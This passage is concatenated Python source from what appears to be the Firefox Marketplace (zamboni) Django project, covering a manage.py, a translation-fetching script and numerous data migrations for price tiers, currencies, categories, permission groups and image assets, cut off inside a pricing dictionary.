process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
error = subprocess.CalledProcessError(retcode, cmd)
error.output = output
raise error
return output
class VideoBase(object):
def __init__(self, filename):
self.filename = filename
self.meta = None
self.errors = []
def _call(self):
raise NotImplementedError
def get_encoded(self, size):
raise NotImplementedError
def get_screenshot(self, size):
raise NotImplementedError
def get_meta(self):
pass
@classmethod
def library_available(cls):
pass
def is_valid(self):
return
########NEW FILE########
__FILENAME__ = generate_categories_translations
#!/usr/bin/env python
import os
import requests
api_url = 'https://marketplace.firefox.com/api/v1/apps/category/?lang=%s'
english_categories = { # Stolen from fireplace's categories.js
'games': 'Games',
#'books': 'Books', # Commented because already present in .po files.
'business': 'Business',
'education': 'Education',
'entertainment': 'Entertainment',
'health-fitness': 'Health & Fitness',
'lifestyle': 'Lifestyle',
'maps-navigation': 'Maps & Navigation',
'music': 'Music',
'news-weather': 'News & Weather',
'photo-video': 'Photo & Video',
'productivity': 'Productivity',
'reference': 'Reference',
'shopping': 'Shopping',
'social': 'Social',
'sports': 'Sports',
'travel': 'Travel',
'utilities': 'Utilities'
}
def build_locale_dict(data):
if not 'objects' in data:
return None
return dict(((d['slug'], d['name']) for d in data['objects']
if d['slug'] in english_categories))
def write_po(filename, locale_categories):
with open(filename, 'a') as f:
for slug, translation in locale_categories.items():
f.write('\n')
f.write('#: /mkt/search/forms.py\n')
f.write('msgid "%s"\n' % english_categories[slug])
f.write('msgstr "%s"\n' % locale_categories[slug].encode('utf-8'))
def main():
if not os.getcwd().endswith('locale'):
print 'Run me from the locale/ directory please.'
return
for locale in os.listdir('.'):
if not os.path.isdir(locale) or locale == 'templates':
# print "Skipping %s since it's not a locale directory" % locale
continue
fname = os.path.join(locale, 'LC_MESSAGES', 'messages.po')
if not os.path.exists(fname):
# print "Skipping %s since it doesn't contain a messages.po file"
continue
print "Requesting categories for locale %s from the API" % locale
response = requests.get(api_url % locale)
if not response.status_code == 200:
print "Error while requesting API, aborting script."
return
locale_categories = build_locale_dict(response.json())
if locale_categories is None:
print "Error in API response, aborting script."
return
if locale_categories == english_categories:
print "Skipping '%s' since API response is not translated" % locale
continue
print "Writing %d translations to %s" % (len(locale_categories), fname)
write_po(fname, locale_categories)
if __name__ == '__main__':
main()
########NEW FILE########
__FILENAME__ = manage
#!/usr/bin/env python
import logging
import os
import site
import sys
import warnings
ROOT = os.path.dirname(os.path.abspath(__file__))
if os.path.splitext(os.path.basename(__file__))[0] == 'cProfile':
if os.environ.get('ZAMBONI_PATH'):
ROOT = os.environ['ZAMBONI_PATH']
else:
print 'When using cProfile you must set $ZAMBONI_PATH'
sys.exit(2)
path = lambda *a: os.path.join(ROOT, *a)
prev_sys_path = list(sys.path)
site.addsitedir(path('apps'))
site.addsitedir(path('vendor/lib/python'))
# Move the new items to the front of sys.path. (via virtualenv)
new_sys_path = []
for item in list(sys.path):
if item not in prev_sys_path:
new_sys_path.append(item)
sys.path.remove(item)
sys.path[:0] = new_sys_path
# No third-party imports until we've added all our sitedirs!
from django.core.management import call_command, execute_from_command_line
# Figuring out what settings file to use.
# 1. Look first for the command line setting.
setting = None
if __name__ == '__main__':
for k, v in enumerate(sys.argv):
if v.startswith('--settings'):
setting = v.split('=')[1]
del sys.argv[k]
break
# 2. If not, find the env variable.
if not setting:
setting = os.environ.get('DJANGO_SETTINGS_MODULE', '')
# Django runserver does that double reload of installed settings, settings
# setting to zamboni.settings. We don't want to have zamboni on the path.
if setting.startswith(('zamboni', # typical git clone destination
'workspace', # Jenkins
'project', # vagrant VM
'freddo')):
setting = setting.split('.', 1)[1]
# The average Django user will have DJANGO_SETTINGS_MODULE set to settings
# for our purposes that means, load the default site, so if nothing is
# specified by now, use the default.
if setting in ('settings', ''):
setting = 'settings_local'
# Finally load the settings file that was specified.
from django.utils import importlib
settings = importlib.import_module(setting)
os.environ['DJANGO_SETTINGS_MODULE'] = setting
if not settings.DEBUG:
warnings.simplefilter('ignore')
import session_csrf
session_csrf.monkeypatch()
# Fix jinja's Markup class to not crash when localizers give us bad format
# strings.
from jinja2 import Markup
mod = Markup.__mod__
trans_log = logging.getLogger('z.trans')
#waffle and amo form an import cycle because amo patches waffle and
#waffle loads the user model, so we have to make sure amo gets
#imported before anything else imports waffle.
import amo
# Hardcore monkeypatching action.
import jingo.monkey
jingo.monkey.patch()
def new(self, arg):
try:
return mod(self, arg)
except Exception:
trans_log.error(unicode(self))
return ''
Markup.__mod__ = new
import djcelery
djcelery.setup_loader()
# Import for side-effect: configures our logging handlers.
# pylint: disable-msg=W0611
from lib.log_settings_base import log_configure
log_configure()
import django.conf
newrelic_ini = getattr(django.conf.settings, 'NEWRELIC_INI', None)
load_newrelic = False
# Monkey patches DRF to not use fqdn urls.
from mkt.api.patch import patch
patch()
if newrelic_ini:
import newrelic.agent
try:
newrelic.agent.initialize(newrelic_ini)
load_newrelic = True
except:
startup_logger = logging.getLogger('z.startup')
startup_logger.exception('Failed to load new relic config.')
if __name__ == "__main__":
# If product details aren't present, get them.
from product_details import product_details
if not product_details.last_update:
print 'Product details missing, downloading...'
call_command('update_product_details')
product_details.__init__() # reload the product details
execute_from_command_line()
########NEW FILE########
__FILENAME__ = 219-new-features
from addons.cron import reset_featured_addons
print 'here we go'
reset_featured_addons()
########NEW FILE########
__FILENAME__ = 250-initial-price-tiers
from decimal import Decimal
from market.models import Price
tiers = [Decimal(x) for x in
'0.99', '1.99', '2.99', '3.99', '4.99', '5.99', '6.99', '7.99', '8.99',
'9.99', '10.99', '11.99', '12.99', '13.99', '14.99', '15.99', '16.99',
'17.99', '18.99', '19.99', '20.99', '21.99', '22.99', '23.99', '24.99',
'29.99', '34.99', '39.99', '44.99', '49.99']
def run():
for i, price in enumerate(tiers, 1):
Price.objects.create(price=price, name='Tier %s' % (i,))
########NEW FILE########
__FILENAME__ = 264-locale-indexes
from django.conf import settings
import elasticutils
from addons.search import setup_mapping
def columns():
es = elasticutils.get_es()
index = settings.ES_INDEXES['default']
return es.get_mapping('addons', index)['addons']['properties'].keys()
def run():
if 'name_finnish' not in columns():
print 'ok'
setup_mapping()
else:
print 'skippint'
assert 'name_finnish' in columns()
########NEW FILE########
__FILENAME__ = 269-one-cent-price
from decimal import Decimal
from django.conf import settings
from market.models import Price
def run():
if not settings.APP_PREVIEW:
return
Price.objects.all().delete()
Price.objects.create(price=Decimal('0.01'), name='Tier 1')
########NEW FILE########
__FILENAME__ = 297-add-android
from applications.models import Application
def run():
Application.objects.create(id=61,
guid='{aa3c5121-dab2-40e2-81ca-7ea25febc110}')
########NEW FILE########
__FILENAME__ = 335-perms-locales
from django.conf import settings
from access.models import Group, GroupUser
LANGS = sorted(list(
set(settings.AMO_LANGUAGES + settings.HIDDEN_LANGUAGES) -
set(['en-US'])))
def run():
Group.objects.create(pk=50006, name='Senior Localizers',
rules='Locales:Edit')
for idx, locale in enumerate(LANGS):
pk = 50007 + idx
name = '%s Localizers' % locale
rules = 'Locale.%s:Edit,L10nTools:View' % locale
group = Group.objects.create(pk=pk, name=name, rules=rules)
print 'New group created: (%d) %s' % (pk, name)
try:
old_group = Group.objects.get(pk__lt=50000, name=name)
except Group.DoesNotExist:
print 'Old group not found: %s' % name
continue
# Rename old groups so they are distinguisable.
old_group.update(name=old_group.name + ' (OLD)')
# Migrate users to new group.
cnt = 0
for user in old_group.users.all():
cnt += 1
GroupUser.objects.create(group=group, user=user)
print 'Migrated %d users to new group (%s)' % (cnt, name)
########NEW FILE########
__FILENAME__ = 356-add-currencies
from decimal import Decimal
from market.models import Price, PriceCurrency
currencies = {
'CAD': {
'Tier 1': '0.99',
'Tier 2': '1.99',
'Tier 3': '2.99',
'Tier 4': '3.99',
'Tier 5': '4.99',
'Tier 6': '5.99',
'Tier 7': '6.99',
'Tier 8': '7.99',
'Tier 9': '8.99',
'Tier 10': '9.99',
'Tier 11': '10.99',
'Tier 12': '11.99',
'Tier 13': '12.99',
'Tier 14': '13.99',
'Tier 15': '14.99',
'Tier 16': '15.99',
'Tier 17': '16.99',
'Tier 18': '17.99',
'Tier 19': '18.99',
'Tier 20': '19.99',
'Tier 21': '20.99',
'Tier 22': '21.99',
'Tier 23': '22.99',
'Tier 24': '23.99',
'Tier 25': '24.99',
'Tier 26': '29.99',
'Tier 27': '34.99',
'Tier 28': '39.99',
'Tier 29': '44.99',
'Tier 30': '49.99',
},
'EUR': {
'Tier 1': '0.79',
'Tier 2': '1.49',
'Tier 3': '2.29',
'Tier 4': '2.99',
'Tier 5': '3.79',
'Tier 6': '4.49',
'Tier 7': '5.29',
'Tier 8': '5.99',
'Tier 9': '6.79',
'Tier 10': '7.49',
'Tier 11': '8.29',
'Tier 12': '8.99',
'Tier 13': '9.79',
'Tier 14': '10.49',
'Tier 15': '11.29',
'Tier 16': '11.99',
'Tier 17': '12.79',
'Tier 18': '13.49',
'Tier 19': '14.29',
'Tier 20': '14.99',
'Tier 21': '15.79',
'Tier 22': '16.49',
'Tier 23': '17.29',
'Tier 24': '17.99',
'Tier 25': '18.79',
'Tier 26': '22.29',
'Tier 27': '26.29',
'Tier 28': '29.99',
'Tier 29': '33.79',
'Tier 30': '37.29',
},
'GBP': {
'Tier 1': '0.69',
'Tier 2': '1.29',
'Tier 3': '1.99',
'Tier 4': '2.49',
'Tier 5': '3.29',
'Tier 6': '3.99',
'Tier 7': '4.49',
'Tier 8': '5.29',
'Tier 9': '5.99',
'Tier 10': '6.49',
'Tier 11': '6.99',
'Tier 12': '7.99',
'Tier 13': '8.29',
'Tier 14': '8.99',
'Tier 15': '9.49',
'Tier 16': '10.29',
'Tier 17': '10.99',
'Tier 18': '11.49',
'Tier 19': '11.99',
'Tier 20': '12.99',
'Tier 21': '13.49',
'Tier 22': '13.99',
'Tier 23': '14.99',
'Tier 24': '15.49',
'Tier 25': '15.99',
'Tier 26': '18.99',
'Tier 27': '22.49',
'Tier 28': '25.49',
'Tier 29': '28.49',
'Tier 30': '31.99',
},
'JPY': {
'Tier 1': '80',
'Tier 2': '160',
'Tier 3': '240',
'Tier 4': '320',
'Tier 5': '400',
'Tier 6': '460',
'Tier 7': '540',
'Tier 8': '620',
'Tier 9': '700',
'Tier 10': '780',
'Tier 11': '860',
'Tier 12': '940',
'Tier 13': '1000',
'Tier 14': '1080',
'Tier 15': '1160',
'Tier 16': '1240',
'Tier 17': '1320',
'Tier 18': '1400',
'Tier 19': '1480',
'Tier 20': '1560',
'Tier 21': '1620',
'Tier 22': '1700',
'Tier 23': '1780',
'Tier 24': '1860',
'Tier 25': '1940',
'Tier 26': '2320',
'Tier 27': '2700',
'Tier 28': '3100',
'Tier 29': '3480',
'Tier 30': '3860',
}
}
def run():
for currency, prices in currencies.items():
for k, v in prices.items():
try:
tier = Price.objects.get(name__localized_string=k)
PriceCurrency.objects.create(tier=tier,
price=Decimal(v),
currency=currency)
except Price.DoesNotExist:
print 'Skipping creating: %s, %s for %s' % (k, v, currency)
########NEW FILE########
__FILENAME__ = 366-tier-0
from decimal import Decimal
from market.models import Price, PriceCurrency
def run():
tier = Price.objects.create(name='Tier 0', price=Decimal('0'),
active=True)
for currency in ['CAD', 'EUR', 'GBP', 'JPY']:
PriceCurrency.objects.create(tier=tier, price=Decimal('0'),
currency=currency)
########NEW FILE########
__FILENAME__ = 376-mkt-featured-collections
# Migration removed because it depends on models which have been removed
def run():
return False
########NEW FILE########
__FILENAME__ = 379-mkt-featured-rename
# Removed this migration because it depends on models that have been removed
def run():
return False
########NEW FILE########
__FILENAME__ = 417-migrate-logs
from django.db import connection, transaction
def run():
cursor = connection.cursor()
cursor.execute('select activity_log_id from log_activity_app;')
ids = [r[0] for r in cursor.fetchall()]
if not ids:
return
cursor.execute('set foreign_key_checks = 0')
cursor.execute('insert into log_activity_mkt '
'select * from log_activity where id IN %(ids)s;',
{'ids':ids})
cursor.execute('insert into log_activity_app_mkt '
'select id, created, modified, addon_id, activity_log_id '
'from log_activity_app;')
cursor.execute('set foreign_key_checks = 1')
transaction.commit_unless_managed()
########NEW FILE########
__FILENAME__ = 424-restricted-group
from access.models import Group
def run():
Group.objects.create(name='Restricted Users', rules='Restricted:UGC')
########NEW FILE########
__FILENAME__ = 427-update-webapp-domain
from mkt.webapps.models import Webapp
def run():
for app in Webapp.objects.all():
if app.manifest_url:
app.update(app_domain=Webapp.domain_from_url(app.manifest_url))
########NEW FILE########
__FILENAME__ = 441-mkt-contribution-tiers
import amo
from market.models import Price
from stats.models import Contribution
def run():
"""
Attach price tier to existing USD contributions for marketplace.
"""
contribs = (Contribution.objects
.filter(price_tier__isnull=True,
addon__type=amo.ADDON_WEBAPP))
for contrib in contribs:
try:
contrib.update(
price_tier=Price.objects.get(price=abs(contrib.amount))
)
except (AttributeError, Price.DoesNotExist) as e:
print str(e)
continue
########NEW FILE########
__FILENAME__ = 453-exclude-games-in-brazil
import mkt
from mkt.webapps.models import AddonExcludedRegion as AER, Webapp
def run():
"""Exclude Games in Brazil."""
games = Webapp.category('games')
if games:
apps = Webapp.objects.filter(categories=games.id)
for app in apps:
AER.objects.get_or_create(addon=app, region=mkt.regions.BR.id)
########NEW FILE########
__FILENAME__ = 465-generate-image-assets
from amo.utils import chunked
from mkt.developers.tasks import generate_image_assets
from mkt.webapps.models import Webapp
def run():
for chunk in chunked(Webapp.objects.all(), 50):
for app in chunk:
try:
generate_image_assets.delay(app)
except Exception:
pass
########NEW FILE########
__FILENAME__ = 468-delete-dupe-assets
from amo.utils import chunked
from mkt.constants import APP_IMAGE_SIZES
from mkt.webapps.models import ImageAsset, Webapp
SIZE_SLUGS = [size['slug'] for size in APP_IMAGE_SIZES]
def run():
"""Delete duplicate image assets."""
for chunk in chunked(Webapp.objects.all(), 50):
for app in chunk:
for slug in SIZE_SLUGS:
assets = ImageAsset.objects.filter(addon=app, slug=slug)
for asset in assets[1:]:
asset.delete()
########NEW FILE########
__FILENAME__ = 479-regenerate-image-assets
from amo.utils import chunked
from mkt.developers.tasks import generate_image_assets
from mkt.webapps.models import Webapp
def run():
for chunk in chunked(Webapp.objects.all(), 50):
for app in chunk:
generate_image_assets.delay(app)
########NEW FILE########
__FILENAME__ = 482-generate-featured-image-assets
from amo.utils import chunked
from mkt.developers.tasks import generate_image_assets
from mkt.webapps.models import Webapp
def run():
"""Generate featured tiles."""
for chunk in chunked(Webapp.objects.all(), 50):
for app in chunk:
generate_image_assets.delay(app, slug='featured_tile')
print u'Generated feature tile for app %d' % app.id
########NEW FILE########
__FILENAME__ = 488-reindex-ratings
#!/usr/bin/env python
from celeryutils import task
from amo.utils import chunked
from amo.decorators import write
from addons.models import Addon
@task
@write
def reindex_reviews(addon_id, **kw):
try:
# Emit post-save signals so ES gets the correct bayesian ratings.
# One review is enough to fire off the tasks.
Addon.objects.get(id=addon_id).reviews[0].save()
except IndexError:
# It's possible that `total_reviews` was wrong.
print 'No reviews found for %s' % addon_id
def run():
"""Fix app ratings in ES (bug 787162)."""
ids = (Addon.objects.filter(total_reviews__gt=0)
.values_list('id', flat=True))
for chunk in chunked(ids, 50):
[reindex_reviews.delay(pk) for pk in chunk]
########NEW FILE########
__FILENAME__ = 497-move-blplugin-app-to-blapp
from apps.blocklist.models import BlocklistApp, BlocklistPlugin
def run():
# only blocked plugins with all 3 are app based blocks, otherwise the
# min/max refer to the version of the plugin.
plugins = (BlocklistPlugin.objects.exclude(min='').exclude(min=None)
.exclude(max='').exclude(max=None)
.exclude(guid='').exclude(guid=None))
for plugin in plugins:
if plugin.guid and plugin.min and plugin.max:
BlocklistApp.objects.create(blplugin=plugin, guid=plugin.guid,
min=plugin.min, max=plugin.max)
# Null out the fields so the migration can be resumed if
# interrupted. This way when the guid field is removed, the min and
# max wont be treated like plugin min and max when they are app min
# and max.
plugin.guid = None
plugin.min = None
plugin.max = None
plugin.save()
########NEW FILE########
__FILENAME__ = 503-gaia-device-type
#!/usr/bin/env python
from celeryutils import task
from django.core.exceptions import ObjectDoesNotExist
from django.db.models import Count
import amo
from addons.models import AddonDeviceType as ADT
from amo.decorators import write
from amo.utils import chunked
@task
@write
def _task(**kw):
# Remove any dupes. `UNIQUE` constraint introduced in migration 504.
dupes = (ADT.objects.values_list('addon', 'device_type')
.annotate(c=Count('id')).filter(c__gt=1))
for addon, device_type, total in dupes:
devices = ADT.objects.filter(addon_id=addon, device_type=device_type)
for d in devices[:total - 1]:
d.delete()
# Remove stale device types.
devices = ADT.objects.all()
for chunk in chunked(devices, 50):
for device in chunk:
try:
device.addon
except ObjectDoesNotExist:
device.delete()
# `DEVICE_MOBILE` -> `DEVICE_MOBILE` and `DEVICE_GAIA`.
devices = ADT.objects.filter(device_type=amo.DEVICE_MOBILE.id)
for chunk in chunked(devices, 50):
for device in chunk:
if amo.DEVICE_GAIA in device.addon.device_types:
continue
device.id = None
device.device_type = amo.DEVICE_GAIA.id
device.save()
device.addon.save()
def run():
"""Mark mobile-compatible apps as compatible for Firefox OS as well."""
_task()
########NEW FILE########
__FILENAME__ = 520-delete-regions
#!/usr/bin/env python
from celeryutils import task
from mkt.webapps.models import AddonExcludedRegion
from amo.decorators import write
@task
@write
def _task(**kw):
# 3 - Canada
# 5 - Australia
# 6 - New Zealand
aers = AddonExcludedRegion.objects.filter(region__in=[3, 5, 6]).delete()
def run():
"""Mark mobile-compatible apps as compatible for Firefox OS as well."""
_task()
########NEW FILE########
__FILENAME__ = 532-unleash-payments-in-usa
import amo
import mkt
from mkt.webapps.models import AddonExcludedRegion
def run():
"""Unleash payments in USA."""
(AddonExcludedRegion.objects
.exclude(addon__premium_type=amo.ADDON_FREE)
.filter(region=mkt.regions.US.id).delete())
########NEW FILE########
__FILENAME__ = 557-cleanup-upsell
from addons.models import AddonUpsell
def run():
for upsell in list(AddonUpsell.objects.all()):
upsell.cleanup()
########NEW FILE########
__FILENAME__ = 566-add-tiers
from decimal import Decimal
from django.db import transaction
from market.models import Price
@transaction.commit_on_success
def run():
print 'Adding in new tiers'
for tier in ['0.10', '0.25', '0.50', '12.49']:
exists = Price.objects.no_cache().filter(price=Decimal(tier)).exists()
if exists:
print 'Tier already exists, skipping: %s' % tier
continue
print 'Created tier: %s' % tier
Price.objects.create(name='Tier 0', price=Decimal(tier),
active=True)
########NEW FILE########
__FILENAME__ = 568-rename-tiers
from django.db import transaction
from market.models import Price
@transaction.commit_on_success
def run():
print 'Renaming tiers'
for k, tier in enumerate(Price.objects.no_cache().filter(active=True)
.order_by('price')):
new = 'Tier %s' % k
print 'Renaming %s to %s' % (tier.name, new)
tier.name = new
tier.save()
########NEW FILE########
__FILENAME__ = 575-reorganize-cats
import amo
from addons.models import Category
def run():
"""
We reorganized our categories:
https://bugzilla.mozilla.org/show_bug.cgi?id=854499
Usage::
python -B manage.py runscript migrations.575-reorganize-cats
"""
all_cats = Category.objects.filter(type=amo.ADDON_WEBAPP)
# (1) "Entertainment & Sports" becomes "Entertainment" and "Sports."
try:
entertainment = all_cats.filter(slug='entertainment-sports')[0]
except IndexError:
print 'Could not find Category with slug="entertainment-sports"'
else:
# (a) Change name of the category to "Entertainment."
entertainment.name = 'Entertainment'
entertainment.slug = 'entertainment'
entertainment.save()
print 'Renamed "Entertainment & Sports" to "Entertainment"'
# (b) Create a new category called "Sports."
Category.objects.create(type=amo.ADDON_WEBAPP, slug='sports',
name='Sports')
print 'Created "Sports"'
# --
# (2) "Music & Audio" becomes "Music".
try:
music = all_cats.filter(slug='music')[0]
except IndexError:
print 'Could not find Category with slug="music"'
else:
music.name = 'Music'
music.save()
print 'Renamed "Music & Audio" to "Music"'
# --
# (3) "Social & Communication" becomes "Social".
try:
social = all_cats.filter(slug='social')[0]
except IndexError:
print 'Could not find Category with slug="social"'
else:
social.name = 'Social'
social.save()
print 'Renamed "Social & Communication" to "Social"'
# --
# (4) "Books & Reference" becomes "Books" and "Reference."
try:
books = all_cats.filter(slug='books-reference')[0]
except IndexError:
print 'Could not find Category with slug="books-reference"'
else:
# (a) Change name of the category to "Books.""
books.name = 'Books'
books.slug = 'books'
books.save()
print 'Renamed "Books & Reference" to "Books"'
# (b) Create a new category called "Reference."
Category.objects.create(type=amo.ADDON_WEBAPP, slug='reference',
name='Reference')
print 'Created "Reference"'
# --
# (5) "Photos & Media" becomes "Photo & Video."
try:
photos = all_cats.filter(slug='photos-media')[0]
except IndexError:
print 'Could not find Category with slug="photos-media"'
else:
photos.name = 'Photo & Video'
photos.slug = 'photo-video'
photos.save()
print 'Renamed "Photos & Media" to "Photo & Video"'
# --
# (6) Add "Maps & Navigation."
Category.objects.create(type=amo.ADDON_WEBAPP, slug='maps-navigation',
name='Maps & Navigation')
print 'Created "Maps & Navigation"'
########NEW FILE########
__FILENAME__ = 578-migrate-remora-admin-events
from datetime import datetime
from itertools import chain
import amo
from access.models import Group
from devhub.models import ActivityLog
from editors.models import EventLog
from users.models import UserProfile
# Are there other group changes we care about here?
# All of the old group IDs aside from Admins seem to have been deleted.
group_map = {
1: 'Admins',
2: 'Add-on Reviewers'
}
def run():
new_groups = Group.objects.filter(name__in=group_map.values())
new_groups = dict((g.name, g) for g in new_groups)
for id, name in group_map.items():
group_map[id] = new_groups[name]
items = (EventLog.objects.values_list('action', 'user', 'added', 'removed',
'changed_id', 'created')
.filter(type='admin',
action__in=('group_addmember',
'group_removemember'),
changed_id__in=group_map.keys())
.order_by('created'))
user_ids = set(chain(*[(i[1], int(i[2] or i[3]))
for i in items
if (i[2] or i[3] or '').isdigit()]))
users = dict((u.id, u)
for u in UserProfile.objects.filter(id__in=user_ids))
for action, admin, added, removed, group_id, created in items:
if action == 'group_addmember':
user_id, action = added, amo.LOG.GROUP_USER_ADDED
else:
user_id, action = removed, amo.LOG.GROUP_USER_REMOVED
if not user_id.isdigit():
continue
user_id = int(user_id)
kw = {'created': created}
if admin in users:
kw['user'] = users[admin]
if user_id in users:
amo.log(action, group_map[group_id], users[user_id], **kw)
# Fudge logs for editors who were added while logging was broken.
created = datetime(2013, 3, 14, 3, 14, 15, 926535)
user = group_map[1].users.all()[0]
group = group_map[2]
logs = (ActivityLog.objects.for_group(group)
.filter(action=amo.LOG.GROUP_USER_ADDED.id))
editors = (UserProfile.objects.filter(groups=group)
.exclude(id__in=[l.arguments[1].id for l in logs]))
for editor in editors:
amo.log(amo.LOG.GROUP_USER_ADDED, group, editor, user=user,
created=created)
########NEW FILE########
__FILENAME__ = 581-rename-tiers
from decimal import Decimal
from market.models import Price
tiers = """
0 0.00
1 0.10
5 0.25
7 0.50
10 0.99
20 1.99
30 2.99
40 3.99
50 4.99
60 6.99
70 9.99
80 12.49
90 14.99
100 19.99
110 24.99
120 29.99
130 39.99
140 49.99
"""
def run():
for tier in tiers.strip().split('\n'):
if not tier.strip():
continue
name, amount = tier.strip().split(' ')
try:
tier = Price.objects.get(price=Decimal(amount))
except Price.DoesNotExist:
print 'Tier not found: %s' % amount
continue
tier.name = name
tier.save()
print 'Tier changed: %s to %s' % (amount, name)
########NEW FILE########
__FILENAME__ = 588-calc-persona-checksums
def run():
pass
########NEW FILE########
__FILENAME__ = 590-theme-checksums-fix
def run():
pass
########NEW FILE########
__FILENAME__ = 594-theme-checksums
def run():
pass
########NEW FILE########
__FILENAME__ = 595-theme-checksums
def run():
pass
########NEW FILE########
__FILENAME__ = 596-theme-checksums
#!/usr/bin/env python
from addons.models import Persona
from addons.tasks import calc_checksum
from amo.utils import chunked
def run():
"""Calculate checksums for all themes."""
pks = Persona.objects.filter(checksum='').values_list('id', flat=True)
for chunk in chunked(pks, 1000):
[calc_checksum.delay(pk) for pk in chunk]
########NEW FILE########
__FILENAME__ = 597-theme-description
#!/usr/bin/env python
from addons.models import Addon
import amo
def run():
"""
Migrate summary to description field for a handful of themes after
getpersonas migration.
"""
# addons = Addon.objects.filter(type=amo.ADDON_PERSONA,
# description__isnull=True, summary__isnull=False)
# for addon in addons:
# addon.description = addon.summary
# addon.summary = ''
# addon.save()
########NEW FILE########
__FILENAME__ = 599-backfill-app-features
#!/usr/bin/env python
from django.db.utils import IntegrityError
from versions.models import Version
from mkt.webapps.models import AppFeatures, Webapp
def run():
for app in Webapp.with_deleted.all():
for ver in Version.with_deleted.filter(addon=app):
try:
ver.features
except AppFeatures.DoesNotExist:
try:
AppFeatures.objects.create(version=ver)
except IntegrityError as e:
print ('[Webapp:%s] IntegrityError while trying to create '
'AppFeatures for version %s: %s' % (app.id, ver.id,
e))
except Exception as e:
print ('[Webapp:%s] Exception while trying to create '
'AppFeatures for version %s: %s' % (app.id, ver.id,
e))
########NEW FILE########
__FILENAME__ = 600-theme-description
#!/usr/bin/env python
from addons.models import Addon
import amo
def run():
"""
Migrate summary to description field for a handful of themes after
getpersonas migration.
"""
addons = Addon.objects.filter(
type=amo.ADDON_PERSONA, description__isnull=True,
summary__isnull=False)
for addon in addons:
addon.description = addon.summary
addon.save()
########NEW FILE########
__FILENAME__ = 607-reboot-price-currencies
from django.db import models
import amo
from market.models import Price
tiers = {
'0.00': {'CO': {'currency': 'COP',
'price': '0.00',
'region': 9},
'ES': {'currency': 'EUR',
'price': '0.00',
'region': 8},
'PL': {'currency': 'PLN',
'operator': 1,
'price': '0.00',
'region': 11},
'US': {'currency': 'USD',
'price': '0.00',
'region': 2},
'VE': {'currency': 'USD',
'price': '0.00',
'region': 10}},
'0.10': {'CO': {'currency': 'COP',
'price': '210.00',
'region': 9},
'ES': {'currency': 'EUR',
'price': '0.10',
'region': 8},
'PL': {'currency': 'PLN',
'operator': 1,
'price': '0.49',
'region': 11},
'US': {'currency': 'USD',
'price': '0.10',
'region': 2},
'VE': {'currency': 'USD',
'price': '0.10',
'region': 10}},
'0.25': {'CO': {'currency': 'COP',
'price': '520.00',
'region': 9},
'ES': {'currency': 'EUR',
'price': '0.25',
'region': 8},
'PL': {'currency': 'PLN',
'operator': 1,
'price': '0.99',
'region': 11},
'US': {'currency': 'USD',
'price': '0.25',
'region': 2},
'VE': {'currency': 'USD',
'price': '0.25',
'region': 10}},
'0.50': {'CO': {'currency': 'COP',
'price': '1050.00',
'region': 9},
'ES': {'currency': 'EUR',
'price': '0.45',
'region': 8},
'PL': {'currency': 'PLN',
'operator': 1,
'price': '1.99',
'region': 11},
'US': {'currency': 'USD',
'price': '0.50',
'region': 2},
'VE': {'currency': 'USD',
'price': '0.50',
'region': 10}},
'0.99': {'CO': {'currency': 'COP',
'price': '2060.00',
'region': 9},
'ES': {'currency': 'EUR',
'price': '0.89',
'region': 8},
'PL': {'currency': 'PLN',
'operator': 1,
'price': '3.99',
'region': 11},
'US': {'currency': 'USD',
'price': '0.99',
'region': 2},
'VE': {'currency': 'USD',
'price': '0.99',
'region': 10}},
'1.99': {'CO': {'currency': 'COP',
'price': '4150.00',
'region': 9},
'ES': {'currency': 'EUR',
'price': '1.89',
'region': 8},
'PL': {'currency': 'PLN',
'operator': 1,
'price': '7.69',
'region': 11},
'US': {'currency': 'USD',
'price': '1.99',
'region': 2},
'VE': {'currency': 'USD',
'price': '1.99',
'region': 10}},
'12.49': {'CO': {'currency': 'COP',
'price': '26070.00',
'region': 9},
'ES': {'currency': 'EUR',
'price': '11.59',
'region': 8},
'PL': {'currency': 'PLN',
'operator': 1,
'price': '48.49',
'region': 11},
'US': {'currency': 'USD',
'price': '12.49',
'region': 2},
'VE': {'currency': 'USD',
'price': '12.49',
'region': 10}},
'14.99': {'ES': {'currency': 'EUR',
'price': '14.19',
'region': 8},
'US': {'currency': 'USD',
'price': '14.99',
'region': 2},
'VE': {'currency': 'USD',
'price': '14.99',
'region': 10}},
'19.99': {'ES': {'currency': 'EUR',
'price': '18.99',
'region': 8},
'US': {'currency': 'USD',
'price': '19.99',
'region': 2},
'VE': {'currency': 'USD',
'price': '19.99',
'region': 10}},
'2.99': {'CO': {'currency': 'COP',
'price': '6240.00',
'region': 9},
'ES': {'currency': 'EUR',
'price': '2.79',
'region': 8},
'PL': {'currency': 'PLN',
'operator': 1,
'price': '11.59',
'region': 11},
'US': {'currency': 'USD',
'price': '2.99',
'region': 2},
'VE': {'currency': 'USD',
'price': '2.99',
'region': 10}},
'24.99': {'ES': {'currency': 'EUR',
'price': '23.59',
'region': 8},
'US': {'currency': 'USD',
'price': '24.99',
'region': 2},
'VE': {'currency': 'USD',
'price': '24.99',
'region': 10}},
'29.99': {'CO': {'currency': 'COP',
'price': '62580.00',
'region': 9},
'ES': {'currency': 'EUR',
'price': '28.39',
'region': 8},
'US': {'currency': 'USD',
'price': '29.99',
'region': 2},
'VE': {'currency': 'USD',
'price': '29.99',
'region': 10}},
'3.99': {'CO': {'currency': 'COP',
'price': '8320.00',
'region': 9},
'ES': {'currency': 'EUR',
'price': '3.79',
'region': 8},
'PL': {'currency': 'PLN',
'operator': 1,
'price': '15.49',
'region': 11},
'US': {'currency': 'USD',
'price': '3.99',
'region': 2},
'VE': {'currency': 'USD',
'price': '3.99',
'region': 10}},
'39.99': {'CO': {'currency': 'COP',
'price': '83460.00',
'region': 9},
'US': {'currency': 'USD',
'price': '39.99',
'region': 2},
'VE': {'currency': 'USD',
'price': '39.99',
'region': 10}},
'4.99': {'CO': {'currency': 'COP',
'price': '10420.00',
'region': 9},
'ES': {'currency': 'EUR',
'price': '4.69',
'region': 8},
'PL': {'currency': 'PLN',
'operator': 1,
'price': '19.49',
'region': 11},
'US': {'currency': 'USD',
'price': '4.99',
'region': 2},
'VE': {'currency': 'USD',
'price': '4.99',
'region': 10}},
'49.99': {'CO': {'currency': 'COP',
'price': '104320.00',
'region': 9},
'US': {'currency': 'USD',
'price': '49.99',
'region': 2},
'VE': {'currency': 'USD',
'price': '49.99',
'region': 10}},
